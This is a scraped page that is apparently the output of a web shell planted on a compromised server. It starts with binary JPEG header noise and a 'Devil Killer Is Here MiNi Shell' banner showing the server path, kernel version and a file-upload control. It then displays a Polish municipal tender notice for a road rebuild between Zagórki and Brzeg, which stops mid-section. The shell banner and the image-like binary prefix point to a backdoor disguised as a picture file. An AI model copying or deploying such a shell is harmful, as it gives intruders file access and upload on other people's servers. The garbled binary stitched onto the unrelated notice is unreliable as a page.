JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20210602/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20210602/0007232402-N-2021.html

<header hidden><table style="border-bottom: 1px solid black; width:100%"><tr><td>Ogłoszenie nr 2021/BZP 00072324 z dnia 2021-06-02</td></tr></table></header><main><!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> Przebudowa drogi na odcinku Zagórki - Brzeg </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">GMINA PĘCZNIEW</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 730934393</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. Główna 10/12</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Pęczniew</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">99-235</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">łódzkie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL714 - Sieradzki</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">43 678 15 19</span></h3> <h3 class="mb-0">1.5.8.) Numer faksu: <span class="normal">43 678 15 19</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">zamowienia@e-peczniew.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">http://e-peczniew.pl/</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Przebudowa drogi na odcinku Zagórki - Brzeg </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-9249f415-c38c-11eb-911f-9ad5f74c2a25</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2021/BZP 00072324</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">02</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2021-06-02</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2021/BZP 00002178/03/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.2 Przebudowa drogi na odcinku Zagórki - Brzeg</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> http://e-peczniew.pl/ <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">Szczegóły dotyczące komunikacji<br/>zamawiającego z wykonawcami wskazane zostały w pkt XIII SWZ dostępnym na stronie postępowania<br/>http://e-peczniew.pl/ zamówienia powyżej 130 000 zł.W postępowaniu o udzielenie zamówienia<br/>komunikacja między Zamawiającym a Wykonawcami odbywa się przy użyciu: - ePUAPu<br/>(Elektronicznej Skrzynki Podawczej – nazwa – /byp620p7f6/skrytka) dostępnego pod adresem:<br/>https://epuap.gov.pl/wps/portal oraz poczty elektronicznej: zamowienia@e-peczniew.pl - poczty<br/>elektronicznej: zamowienia@e-peczniew.pl (nie dotyczy składania ofert - patrz pkt XIII.12 SWZ)-<br/>miniPortalu, który dostępny jest pod adresem: https://miniportal.uzp.gov.pl/</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Wymagania techniczne i organizacyjne wysyłania i odbierania dokumentów elektronicznych,<br/>elektronicznych kopii dokumentów i oświadczeń oraz informacji przekazywanych przy ich użyciu zostały<br/>opisane w Regulaminie korzystania z systemu miniPortal oraz warunkach korzystania z elektronicznej<br/>platformy usług administracji publicznej ePUAP. Maksymalny rozmiar plików przesyłanych za<br/>pośrednictwem dedykowanych formularzy do: złożenia, zmiany, wycofania oferty lub wniosku oraz do<br/>komunikacji wynosi 150 MB.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">/Numeracja zgodna z SWZ/II.1. Zgodnie z art. 13 ust. 1 i 2<br/>rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie<br/>ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego<br/>przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o danych) (Dz.<br/>Urz. UE L 119 z dnia 4 maja 2016 r., str. 1; zwanym dalej „RODO”) informujemy, że:A) administratorem<br/>Pani/Pana danych osobowych jest Gmina Pęczniew reprezentowana przez Wójta Gminy Pęczniew ;B)<br/>administrator wyznaczył Inspektora Danych Osobowych- Panią Magdalenę Kuszmider, z którą można<br/>się kontaktować pod adresem e-mail: kontak@iszd.plC) Pani/Pana dane osobowe przetwarzane będą<br/>na podstawie art. 6 ust. 1 lit. c RODO w celu związanym z przedmiotowym postępowaniem o<br/>udzielenie zamówienia publicznego, prowadzonym w trybie podstawowym bez negocjacji.D)<br/>odbiorcami Pani/Pana danych osobowych będą osoby lub podmioty, którym udostępniona zostanie<br/>dokumentacja postępowania w oparciu o art. 74 ustawy P.z.p.E) Pani/Pana dane osobowe będą<br/>przechowywane, zgodnie z art. 78 ust. 1 P.z.p. przez okres 4 lat od dnia zakończenia postępowania o<br/>udzielenie zamówienia, a jeżeli czas trwania umowy przekracza 4 lata, okres przechowywania<br/>obejmuje cały czas trwania umowy;F) obowiązek podania przez Panią/Pana danych osobowych<br/>bezpośrednio Pani/Pana dotyczących jest wymogiem ustawowym określonym w przepisanych ustawy<br/>P.z.p., związanym z udziałem w postępowaniu o udzielenie zamówienia publicznego.G) w odniesieniu<br/>do Pani/Pana danych osobowych decyzje nie będą podejmowane w sposób zautomatyzowany,<br/>stosownie do art. 22 RODO.H) posiada Pani/Pan:a) na podstawie art. 15 RODO prawo dostępu do<br/>danych osobowych Pani/Pana dotyczących (w przypadku, gdy skorzystanie z tego prawa wymagałoby<br/>po stronie administratora niewspółmiernie dużego wysiłku może zostać Pani/Pan zobowiązana do<br/>wskazania dodatkowych informacji mających na celu sprecyzowanie żądania, w szczególności podania<br/>nazwy lub daty postępowania o udzielenie zamówienia publicznego lub konkursu albo sprecyzowanie<br/>nazwy lub daty zakończonego postępowania o udzielenie zamówienia);b) na podstawie art. 16 RODO<br/>prawo do sprostowania Pani/Pana danych osobowych (skorzystanie z prawa do sprostowania nie<br/>może skutkować zmianą wyniku postępowania o udzielenie zamówienia publicznego ani zmianą<br/>postanowień umowy w zakresie niezgodnym z ustawą P.z.p. oraz nie może naruszać integralności<br/>protokołu oraz jego załączników);c) na podstawie art. 18 RODO prawo żądania od administratora<br/>ograniczenia przetwarzania danych osobowych z zastrzeżeniem okresu trwania postępowania o<br/>udzielenie zamówienia publicznego lub konkursu oraz przypadków, o których mowa w art. 18 ust. 2<br/>RODO (prawo do ograniczenia przetwarzania nie ma zastosowania w odniesieniu do przechowywania,<br/>w celu zapewnienia korzystania ze środków ochrony prawnej lub w celu ochrony praw innej osoby<br/>fizycznej lub prawnej, lub z uwagi na ważne względy interesu publicznego Unii Europejskiej lub<br/>państwa członkowskiego);d) prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych<br/>Osobowych, gdy uzna Pani/Pan, że przetwarzanie danych osobowych Pani/Pana dotyczących narusza<br/>przepisy RODO; I) nie przysługuje Pani/Panu:a) w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo<br/>do usunięcia danych osobowych;b) prawo do przenoszenia danych osobowych, o którym mowa w art.<br/>20 RODO;c) na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych,<br/>gdyż podstawą prawną przetwarzania Pani/Pana danych osobowych jest art. 6 ust. 1 lit. c RODO; J)<br/>przysługuje Pani/Panu prawo wniesienia skargi do organu nadzorczego na niezgodne z RODO<br/>przetwarzanie Pani/Pana danych osobowych przez administratora. Organem właściwym dla<br/>przedmiotowej skargi jest Urząd Ochrony Danych Osobowych, ul. Stawki 2, 00-193 Warszawa.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">ZP 271.2.2021</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest przebudowa drogi na odcinku Zagórki – Brzeg, powiat poddębicki, województwo łódzkie. Długość planowanej do przebudowy drogi to 0+990m. Droga położona jest na działce ewidencyjnej nr 142 obręb Zagórki oraz nr 8/2 obręb Brzeg. Szczegółowy opis przedmiotu zamówienia zawarty został w pkt V SWZ dostępnym na stronie postępowania http://e-peczniew.pl/ zamówienia powyżej 130 000 zł. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45233140-2 - Roboty drogowe</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja do --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2021-09-30</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Za najkorzystniejszą zostanie uznana oferta Wykonawcy, który spełni<br/>wszystkie postawione w niniejszej SWZ warunki, nie podlega wykluczeniu oraz uzyska łącznie<br/>największą liczbę punktów stanowiących sumę punktów przyznanych w ramach każdego z podanych<br/>kryteriów zgodnie z poniższym wzorem:P = C +GGdzie:P –łączna liczba punktów oferty ocenianejC –<br/>liczba punktów uzyskanych w kryterium „Cena”G-liczba punktów uzyskanych w kryterium „Gwarancja<br/>jakości i rękojmia za wady”.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60,00</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Gwarancja jakości i rękojmia za wady</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40,00</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> I. Zdolność techniczna lub zawodowa: Wykonawca spełni warunek, jeśli:- wykaże, że w okresie<br/>ostatnich 5-ciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia<br/>działalności jest krótszy - w tym okresie wykonał co najmniej 2 roboty budowlane polegające na<br/>budowie/ rozbudowie/ przebudowie dróg publicznych (zgodnie z rozporządzeniem Ministra<br/>Transportu i Gospodarki Morskiej z dnia 02.03.1999 r. w sprawie warunków technicznych, jakim<br/>powinny odpowiadać drogi publiczne i ich usytuowanie, Dz.U.2016.124 t.j.) klasy technicznej<br/>min. D. Wartość każdej budowy/rozbudowy/przebudowy nie może być niższa niż 200 000, 00 zł<br/>netto ORAZ wykaże, że dysponuje lub będzie dysponować i skieruje do realizacji zamówienia<br/>publicznego osoby, mogące pełnić funkcje:- Kierownik budowy w specjalności inżynieryjnej<br/>drogowej - Osoba posiadająca uprawnienia do kierowania robotami budowlanymi w specjalności<br/>inżynieryjnej drogowej w zakresie odpowiadającym przedmiotowi zamówienia, która w okresie<br/>ostatnich 5 lat przed upływem terminu składania ofert pełniła funkcję kierownika budowy lub<br/>robót przy minimum 2 zadaniach polegających na budowie, przebudowie lub rozbudowie dróg<br/>publicznych klasy technicznej min. D, o wartości nie mniejszej niż 200 000,00 zł (netto) każde<br/>zadanie.<br/><br/>Uprawnienia, o których mowa powyżej powinny być zgodne z ustawą z dnia 7 lipca 1994 r. Prawo budowlane oraz Rozporządzeniem Ministra Infrastruktury i Rozwoju z dnia 29 kwietnia 2019 r. w sprawie przygotowania zawodowego do wykonywania samodzielnych funkcji technicznych w<br/>budownictwie lub ważne odpowiadające im kwalifikacje, nadane na podstawie wcześniej obowiązujących przepisów upoważniające do projektowania w zakresie objętym niniejszym<br/>zamówieniem. Zamawiający dopuści odpowiadające im ważne uprawnienia budowlane wydane<br/>na podstawie uprzednio obowiązujących przepisów prawa lub odpowiednich przepisów<br/>obowiązujących na terenie kraju, z którego pochodzi dana osoba, które w zakresie objętym<br/>zamówieniem pozwalać będą na pełnienie samodzielnych funkcji technicznych w budownictwie<br/>w ww. specjalnościach. W przypadku Wykonawców zagranicznych, dopuszcza się również<br/>kwalifikacje, zdobyte w innych państwach, na zasadach określonych w art.12 a ustawy Prawo<br/>budowlane, z uwzględnieniem postanowień ustawy z dnia 22 grudnia 2015 r. o zasadach<br/>uznawania kwalifikacji zawodowych nabytych w państwach członkowskich Unii Europejskiej. W<br/>przypadku osób będących obywatelami państw członkowskich UE, Konfederacji Szwajcarskiej<br/>lub państw członkowskich (EFTA)-stron umowy o Europejskim Obszarze Gospodarczym –<br/>prawo do wykonywania samodzielnych funkcji technicznych w budownictwie na terytorium RP<br/>winno być potwierdzone odpowiednią decyzją o uznaniu kwalifikacji zawodowych lub prawa do<br/>świadczenia usług transgranicznych. Dopuszcza się uprawnienia równoważne (w zakresie<br/>koniecznym do wykonania przedmiotu zamówienia) – dla osób, które posiadają uprawnienia<br/>uzyskane przed dniem wejścia w życie ustawy z dnia 7 lipca 1994 r. Prawo budowlane lub<br/>stwierdzenie posiadania przygotowania zawodowego do pełnienia samodzielnych funkcji<br/>technicznych w budownictwie i zachowały uprawnienia do pełnienia tych funkcji w<br/>dotychczasowym zakresie. Zamawiający może na każdym etapie postępowania uznać, że<br/>Wykonawca nie posiada wymaganych zdolności, jeżeli zaangażowanie zasobów technicznych<br/>lub zawodowych Wykonawcy w inne przedsięwzięcie gospodarcze Wykonawcy może mieć<br/>negatywny wpływ na realizację niniejszego zamówienia. <br/>II. Sytuacja ekonomiczna lub finansowa: Wykonawca spełni warunek jeżeli wykaże, że jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na sumę gwarancyjną nie mniejszą niż 320 000,00 zł, lub dla walut obcych na kwotę w wysokości równoważnej liczonej według średniego kursu złotego w stosunku do walut obcych ogłoszonego przez NBP obowiązującego w dniu, w którym zamieszczone zostało ogłoszenie o<br/>niniejszym zamówieniu w Biuletynie Zamówień Publicznych. Zamawiający, w stosunku do<br/>Wykonawców wspólnie ubiegających się o udzielenie zamówienia, w odniesieniu do warunku<br/>dotyczącego zdolności technicznej, finansowej lub zawodowej – dopuszcza łączne spełnianie<br/>warunku przez Wykonawców. Zamawiający może na każdym etapie postępowania, uznać, że<br/>Wykonawca nie posiada wymaganych zdolności, jeżeli posiadanie przez Wykonawcę<br/>sprzecznych interesów, w szczególności zaangażowanie zasobów technicznych lub<br/>zawodowych wykonawcy w inne przedsięwzięcia gospodarcze wykonawcy może mieć negatywny wpływ na realizację zamówienia. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">Oświadczenie Wykonawcy o aktualności informacji zawartych w oświadczeniu, o którym mowa w art.<br/>125 ust. 1 ustawy P.z.p. w zakresie art. 108 ust. 1 pkt 1 -6, oraz art. 109 ust. 1 pkt 4 ustawy</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">A) wykaz robót budowlanych wykonanych nie wcześniej niż w okresie<br/>ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest<br/>krótszy – w tym okresie, wraz z podaniem ich rodzaju, daty, miejsca wykonania i podmiotów, na rzecz<br/>których roboty te zostały wykonane, ich wartości, z załączeniem dowodów określających czy te roboty<br/>budowlane zostały wykonane należycie, w szczególności informacji o tym czy roboty zostały wykonane<br/>zgodnie z przepisami prawa budowlanego i prawidłowo ukończone, przy czym dowodami, o których<br/>mowa, są referencje bądź inne dokumenty wystawione przez podmiot, na rzecz którego roboty<br/>budowlane były wykonywane, a jeżeli z uzasadnionej przyczyny o obiektywnym charakterze<br/>wykonawca nie jest w stanie uzyskać tych dokumentów – inne dokumenty (wzór wykazu stanowi<br/>załącznik nr 2.4 do formularza oferty);B) wykaz osób, skierowanych przez Wykonawcę do realizacji<br/>zamówienia publicznego, wraz z informacjami na temat ich uprawnień i doświadczenia niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych przez nie czynności oraz<br/>informacją o podstawie do dysponowania tymi osobami (wzór wykazu stanowi załącznik nr 2.5 do<br/>formularza oferty);C) dokumentu potwierdzającego, że Wykonawca jest ubezpieczony od<br/>odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia<br/>na sumę gwarancyjną określoną przez Zamawiającego w warunku.</span> </h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> Wykonawca, który polega na zdolnościach lub sytuacji podmiotów udostępniających zasoby,<br/>składa, wraz z ofertą, zobowiązanie podmiotu udostępniającego zasoby do oddania mu do<br/>dyspozycji niezbędnych zasobów na potrzeby realizacji danego zamówienia lub inny<br/>podmiotowy środek dowodowy potwierdzający, że wykonawca realizując zamówienie, będzie<br/>dysponował niezbędnymi zasobami tych podmiotów. Wzór oświadczenia stanowi załącznik nr<br/>2.3 do formularza oferty.Wykonawca, w przypadku polegania na zdolnościach lub sytuacji<br/>podmiotów udostępniających zasoby, przedstawia, wraz z oświadczeniem, o którym mowa w<br/>Rozdziale X ust. 1 SWZ, także oświadczenie podmiotu udostępniającego zasoby,<br/>potwierdzające brak podstaw wykluczenia tego podmiotu oraz odpowiednio spełnianie<br/>warunków udziału w postępowaniu, w zakresie, w jakim wykonawca powołuje się na jego<br/>zasoby. Wzór oświadczenia stanowi załącznik nr 2.2 do formularza oferty.Wykonawcy wspólnie<br/>ubiegający się o zamówienie dołączają do oferty: pełnomocnictwo do reprezentowania ich w<br/>postępowaniu albo do reprezentowania i zawarcia umowy w sprawie zamówienia publicznego,<br/>oświadczenie, z którego wynika, które roboty budowlane wykonają poszczególni<br/>wykonawcy.Wraz z ofertą Wykonawca jest zobowiązany złożyć również: dowód wniesienia<br/>wadium; dokumenty, z których wynika prawo do podpisania oferty; odpowiednie pełnomocnictwa<br/>(jeżeli dotyczy). <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> /numeracja zgodnie z SWZ/XVII. Wymagania dotyczące wadiumXVII.1. Wykonawca<br/>zobowiązany jest do zabezpieczenia swojej oferty wadium w wysokości: 4 000,00 (słownie: cztery<br/>tysiące 00/100 złotych).XVII.2. Wadium wnosi się przed upływem terminu składania ofert.XVII.3.<br/>Wadium może być wnoszone w jednej lub kilku następujących formach: pieniądzu; gwarancjach<br/>bankowych; gwarancjach ubezpieczeniowych; 